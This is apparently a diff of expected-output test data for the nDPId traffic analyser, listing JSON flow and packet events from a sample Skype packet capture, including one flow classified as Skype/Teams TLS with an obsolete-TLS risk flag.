-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969704663,"flow_last_seen":1431969704663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969704663,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1431969704663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969704663,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjY9AAEAGMVPAqAEib91KLsOwnFtwFABlAAAAALAC\/\/8u+gAAAgQFtAEDAwUBAQgKPiN9hAAAAAAEAgAA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1462,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969704664,"flow_last_seen":1431969704664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969704664,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1431969704664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969704664,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvDNAAEAGM9LAqAEinTfrsMOxnFbKZQg9AAAAALAC\/\/\/99wAAAgQFtAEDAwUBAQgKPiN9hAAAAAAEAgAA"} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1463,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969704664,"flow_last_seen":1431969704664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969704664,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1431969704664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969704664,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIjNAAEAGNnTAqAEiQTffD8OynFri9dA8AAAAALAC\/\/+GBAAAAgQFtAEDAwUBAQgKPiN9hAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":2,"flow_last_seen":1431969704743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969704743,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+gmdN+uwwKgBIpxWw7HlrcetymUIPqASOJDOiAAAAgQFrAQCCApF6hSRPiN9hAEDAwk="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1465,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":3,"flow_last_seen":1431969704743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969704743,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NN1AAEAGuzTAqAEinTfrsMOxnFbKZQg+5a3HroAQECwlZAAAAQEICj4jfdNF6hSR"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1467,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":1431969704794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969704794,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYatBN98PwKgBIpxaw7KHsi8C4vXQPaASOJCmxwAAAgQFrAQCCAouudI2PiN9hAEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1468,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":1431969704794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969704794,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iwlAAEAGzanAqAEiQTffD8OynFri9dA9h7IvA4AQECz9cAAAAQEICj4jfgUuudI2"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1478,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":1431969704959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969704959,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOZv3UouwKgBIpxbw7DJYD8HcBQAZqASOJBMRQAAAgQFrAQCCApNhWUvPiN9hAEDAwk="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1479,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1431969704959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969704959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04b5AAEAG3S\/AqAEib91KLsOwnFtwFABmyWA\/CIAQECyiSwAAAQEICj4jfqhNhWUv"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1490,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969705713,"flow_last_seen":1431969705713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969705713,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1490,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1431969705713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969705713,"pkt":"0NQSxnP1PBXCt3IOCABFAABAO5ZAAEAG5a3AqAEiQAQXpsOznFablHTpAAAAALAC\/\/\/tRQAAAgQFtAEDAwUBAQgKPiOBlwAAAAAEAgAA"} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":1431969705916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969705916,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIpxWw7Pn2AWqm5R06qASOJA+QQAAAgQFrAQCCApMP02qPiOBlwEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":1431969705916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969705916,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0dcVAAEAGq4rAqAEiQAQXpsOznFablHTq59gFq4AQECyUoQAAAQEICj4jgmFMP02q"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1501,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969706277,"flow_last_seen":1431969706277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969706277,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1431969706277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969706277,"pkt":"0NQSxnP1PBXCt3IOCABFAABALAFAAEAGkuHAqAEib91KLsO0AbvHHCHtAAAAALAC\/\/9KwwAAAgQFtAEDAwUBAQgKPiODxwAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1502,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969706277,"flow_last_seen":1431969706277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969706277,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1502,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1431969706277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969706277,"pkt":"0NQSxnP1PBXCt3IOCABFAABApn5AAEAGSYfAqAEinTfrsMO1AbsGcnDPAAAAALAC\/\/\/trQAAAgQFtAEDAwUBAQgKPiODxwAAAAAEAgAA"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1503,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969706277,"flow_last_seen":1431969706277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969706277,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1431969706277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969706277,"pkt":"0NQSxnP1PBXCt3IOCABFAABAkWpAAEAGxzzAqAEiQTffD8O2Abu4rlNDAAAAALAC\/\/\/BnQAAAgQFtAEDAwUBAQgKPiODxwAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1505,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":1431969706353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969706353,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+gmdN+uwwKgBIgG7w7Xvxq\/pBnJw0KASOJDKVgAAAgQFrAQCCApF6hYkPiODxwEDAwk="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1506,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":3,"flow_last_seen":1431969706354,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969706354,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0l01AAEAGWMTAqAEinTfrsMO1AbsGcnDQ78av6oAQECwhNQAAAQEICj4jhBNF6hYk"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1508,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":1431969706407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969706407,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYatBN98PwKgBIgG7w7bIenZGuK5TRKASOJBYwQAAAgQFrAQCCAouudPJPiODxwEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1509,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":1431969706408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969706408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IiZAAEAGNo3AqAEiQTffD8O2Abu4rlNEyHp2R4AQECyvaQAAAQEICj4jhEkuudPJ"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":1431969706572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969706572,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOZv3UouwKgBIgG7w7R3epf\/xxwh7qASOJBfaQAAAgQFrAQCCApNhWbCPiODxwEDAwk="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":1431969706572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969706572,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CZNAAEAGtVvAqAEib91KLsO0AbvHHCHud3qYAIAQECy1bQAAAQEICj4jhO1NhWbC"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1528,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969707326,"flow_last_seen":1431969707326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969707326,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1431969707326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969707326,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1ORAAEAGTF\/AqAEiQAQXpsO3Abu4qWeDAAAAALAC\/\/9x6QAAAgQFtAEDAwUBAQgKPiOH3AAAAAAEAgAA"} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":1431969707546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969707546,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIgG7w7ccEsw5uKlnhKASOJDGigAAAgQFrAQCCApMP087PiOH3AEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1532,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1431969707546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969707546,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0EpBAAEAGDsDAqAEiQAQXpsO3Abu4qWeEHBLMOoAQECwc2gAAAQEICj4jiLdMP087"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1587,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969710853,"flow_last_seen":1431969710853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969710853,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1587,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1431969710853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969710853,"pkt":"0NQSxnP1PBXCt3IOCABFAABAz19AAEAG2DnAqAEinTg0HMO8nEnrI3UzAAAAALAC\/\/8PzQAAAgQFtAEDAwUBAQgKPiOVkAAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1589,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1431969711097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969711097,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIpxJw7we\/\/hU6yN1NKASOJAgZAAAAgQFrAQCCApMXGQgPiOVkAEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1431969711097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969711097,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CpBAAEAGnRXAqAEinTg0HMO8nEnrI3U0Hv\/4VYAQECx2mwAAAQEICj4jloNMXGQg"} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698797,"flow_last_seen":1431969698797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1431969698797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969698797,"pkt":"0NQSxnP1PBXCt3IOCABFAABASetAAEAG9Y7AqAEiF84hpsOqAbtGC\/RmAAAAALAC\/\/+XCwAAAgQFtAEDAwUBAQgKPiNmuAAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":2,"flow_last_seen":1431969698840,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969698840,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w6oZSGV1Rgv0Z6ASOJDhugAAAgQFrAQCCArsLyLPPiNmuAEDAwU="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":3,"flow_last_seen":1431969698840,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969698840,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ZSJAAEAG2mPAqAEiF84hpsOqAbtGC\/RnGUhldoAQECw4twAAAQEICj4jZuLsLyLP"} +00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1357,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969698797,"flow_last_seen":1431969698841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431969698841,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969699142,"flow_last_seen":1431969699142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969699142,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431969699142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969699142,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQstAAEAGrVjAqAEinTfrksOrAbuMrH5PAAAAALAC\/\/911AAAAgQFtAEDAwUBAQgKPiNoDgAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1360,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1431969699217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969699217,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIgG7w6sASTQ1jKx+UKASOJCu2QAAAgQFrAQCCApMXR6HPiNoDgEDAwk="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1361,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":3,"flow_last_seen":1431969699217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969699217,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ol1AAEAGTdLAqAEinTfrksOrAbuMrH5QAEk0NoAQECwFuQAAAQEICj4jaFlMXR6H"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1367,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969699577,"flow_last_seen":1431969699577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969699577,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1431969699577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969699577,"pkt":"0NQSxnP1PBXCt3IOCABFAABAuMZAAEAGoFTAqAEinTeCm8OsnFQhlXAyAAAAALAC\/\/+7tgAAAgQFtAEDAwUBAQgKPiNpvQAAAAAEAgAA"} 
